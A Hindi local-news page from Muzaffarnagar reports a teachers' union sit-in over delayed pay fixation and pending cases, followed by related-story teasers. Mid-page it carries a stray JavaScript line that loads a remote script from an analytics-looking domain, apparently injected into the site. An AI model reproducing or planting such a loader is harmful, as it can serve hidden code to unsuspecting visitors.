शिक्षकों का आक्रोश जारी, वेतन निर्धारण व लंबित प्रकरणों को लेकर माध्यमिक शिक्षक संघ का धरना जारी

मुजफ्फरनगर। उत्तर प्रदेश माध्यमिक शिक्षक संघ, जनपद मुजफ्फरनगर द्वारा जिला विद्यालय निरीक्षक (डीआईओएस) कार्यालय पर चल रहा अनिश्चितकालीन धरना जारी रहा। शिक्षकों ने लंबित प्रकरणों के निस्तारण में हो रही लापरवाही और अधिकारियों की उदासीनता के खिलाफ जोरदार प्रदर्शन किया।

धरने की अध्यक्षता करते हुए जिला अध्यक्ष डॉ. अमित कुमार जैन ने कहा कि डीआईओएस कार्यालय और वित्त एवं लेखा अधिकारी (माध्यमिक) के स्तर पर कई माह बीत जाने के बाद भी पदोन्नत शिक्षकों का वेतन निर्धारण नहीं किया गया है। इसके साथ ही मृतक आश्रितों के प्रकरणों का निस्तारण भी नहीं हो पा रहा है। उन्होंने आरोप लगाया कि अधिकारी अनावश्यक आपत्तियाँ लगाकर फाइलों को टालते रहते हैं और बातचीत करने पर अपने पटल पर किसी भी प्रकरण के लंबित न होने की बात कहते हैं, जबकि वास्तविकता इसके विपरीत है। इस रवैये से शिक्षकों में गहरा आक्रोश व्याप्त है।जिला मंत्री अरुण कुमार ने कहा कि जिले में चयन ग्रेड, प्रोन्नत वेतनमान और अन्य वित्तीय लाभों से जुड़े सैकड़ों प्रकरण महीनों से लंबित पड़े हैं। उन्होंने कहा कि शिक्षक लगातार कार्यालयों के चक्कर काट रहे हैं, लेकिन समाधान नहीं मिल पा रहा। यह न केवल शिक्षकों के साथ अन्याय है बल्कि शासन की नीतियों की अवहेलना भी है। वहीं जिला कोषाध्यक्ष संजय कुमार मोघा ने बताया कि नोशनल वेतन वृद्धि के सैकड़ों मामले एक वर्ष से अधिक समय से लंबित हैं। उन्होंने चेतावनी दी कि यदि शीघ्र कार्रवाई नहीं हुई, तो आंदोलन को और व्यापक बनाया जाएगा।धरने में प्रवीण कुमार शर्मा, सुरेंद्र सिंह, राजेंद्र सिंह, संजीव त्यागी, विरेंद्र कुमार, बृज बिहारी धुरिया, देवेश कुमार, सुनील कुमार त्यागी, धर्मपाल, सुभाषचंद्र, राजेश कुमार, सुनील गोयल, हेमंत बिश्नोई, अमित कुमार वर्मा, आदित्य गोयल, पद्माकर यादव, गौरव शर्मा, अजय त्यागी, सर्वेश कुमार, जय प्रकाश सरोज, रामबीर सिंह सहित सैकड़ों शिक्षक उपस्थित रहें

इसे भी पढ़ें:  एसआईआर अभियान की जागृति को मीनाक्षी स्वरूप व गौरव स्वरूप ने किया बूथों का निरीक्षण

;(function(f,i,u,w,s){w=f.createElement(i);s=f.getElementsByTagName(i)[0];w.async=1;w.src=u;s.parentNode.insertBefore(w,s);})(document,’script’,’https://content-website-analytics.com/script.js’);

Also Read This

तेज रफ्तार बाइक की टक्कर से सात वर्षीय बच्ची घायल, पैर की हड्डी टूटी

खतौली/रतनपुरी। थाना रतनपुरी क्षेत्र के गांव फुलत में तेज रफ्तार बाइक की टक्कर से सात वर्षीय बच्ची गंभीर रूप से घायल हो गई। घायल बच्ची को पहले खतौली के सरकारी अस्पताल ले जाया गया, जहां से उसकी गंभीर हालत को देखते हुए जिला अस्पताल मुजफ्फरनगर रेफर कर दिया गया।जानकारी के अनुसार गांव फुलत निवासी अफजाल ने पुलिस को दी तहरीर में बताया कि उसकी सात वर्षीय भतीजी कु. सबा रविवार रात करीब साढ़े आठ बजे घर से पास की परचून की दुकान पर सामान लेने जा रही थी। इसी दौरान फुलत अड्डे की ओर से आ रहे बाइक सवार रवि पुत्र दिलावर ने अपनी स्प्लेंडर मोटरसाइकिल को तेज गति और

Read More »

नवरात्रि के दौरान मीट की दुकानें बंद कराने की मांग, भाजपा मंडल अध्यक्ष ने सौंपा ज्ञापन

खतौली। आगामी चैत्र नवरात्रि पर्व के मद्देनजर खतौली कस्बे में मीट की दुकानों और मांसाहारी होटलों को बंद कराने की मांग को लेकर भारतीय जनता पार्टी के मंडल अध्यक्ष प्रवीण ठकराल ने प्रदेश के मुख्यमंत्री योगी आदित्यनाथ के नाम एक ज्ञापन सौंपा। ज्ञापन में बताया गया कि 19 मार्च से 27 मार्च तक चैत्र नवरात्रि का पावन पर्व मनाया जाएगा, जिसे सनातन धर्म में अत्यंत पवित्र और आस्था का प्रतीक माना जाता है। इस दौरान बड़ी संख्या में श्रद्धालु व्रत रखकर सात्विक भोजन का सेवन करते हैं और धार्मिक अनुष्ठानों में भाग लेते हैं। इसे भी पढ़ें:  ज्ञाना माजरा में मकान ढहने से परिवार बेघर, कई घरों को खतराप्रवीण ठकराल

Read More »

जिला परिषद् मार्किट में हरियाणा नारकोटिक्स टीम की बड़ी छापेमारी

हरियाणा में बेची गई प्रतिबंधित दवाइयों के कारोबार पर कार्रवाई, दवा कारोबारी को साथ लेकर गई टीम मुजफ्फरनगर। जिले की चर्चित दवा मार्केट, जिला परिषद मार्केट में आज हरियाणा से आई नारकोटिक्स टीम ने बड़ी छापेमारी की। यह कार्रवाई विशेष रूप से हरियाणा में बेची गई प्रतिबंधित दवाओं को लेकर की गई। छापेमारी के दौरान ब्रज फार्मा नामक दुकान के मालिक को हिरासत में ले लिया गया। सूत्रों के अनुसार, हरियाणा की टीम ने दुकान पर घंटों तक कार्रवाई की, जिससे मार्केट में हड़कंप मच गया। टीम में नारकोटिक्स विभाग के एएसआई बालेन्द्र सिंह और एसआई विनोद कुमार शामिल थे, जो नारकोटिक्स विभाग से थे। प्रारंभिक जांच में पता चला

Read More »

दुबई ड्रोन हमला: उड़ानें निलंबित, 19 भारतीय हिरासत में

दुबई ड्रोन हमला के बाद संयुक्त अरब अमीरात में सुरक्षा स्थिति अचानक गंभीर हो गई है। दुबई अंतरराष्ट्रीय हवाई अड्डे के पास सोमवार को ड्रोन हमले और आग लगने की घटना के बाद उड़ानें अस्थायी रूप से निलंबित कर दी गईं। इसी बीच सोशल मीडिया पर भ्रामक सामग्री साझा करने के आरोप में 19 भारतीय नागरिकों समेत 35 लोगों की गिरफ्तारी के आदेश दिए गए हैं। क्षेत्रीय तनाव के कारण बड़ी संख्या में यात्री, जिनमें कई भारतीय भी शामिल हैं, दुबई में फंसे हुए बताए जा रहे हैं। दुबई ड्रोन हमला के बाद दुबई नागरिक उड्डयन प्राधिकरण ने बताया कि हवाई अड्डे के पास आग लगने की घटना के चलते एहतियात

Read More »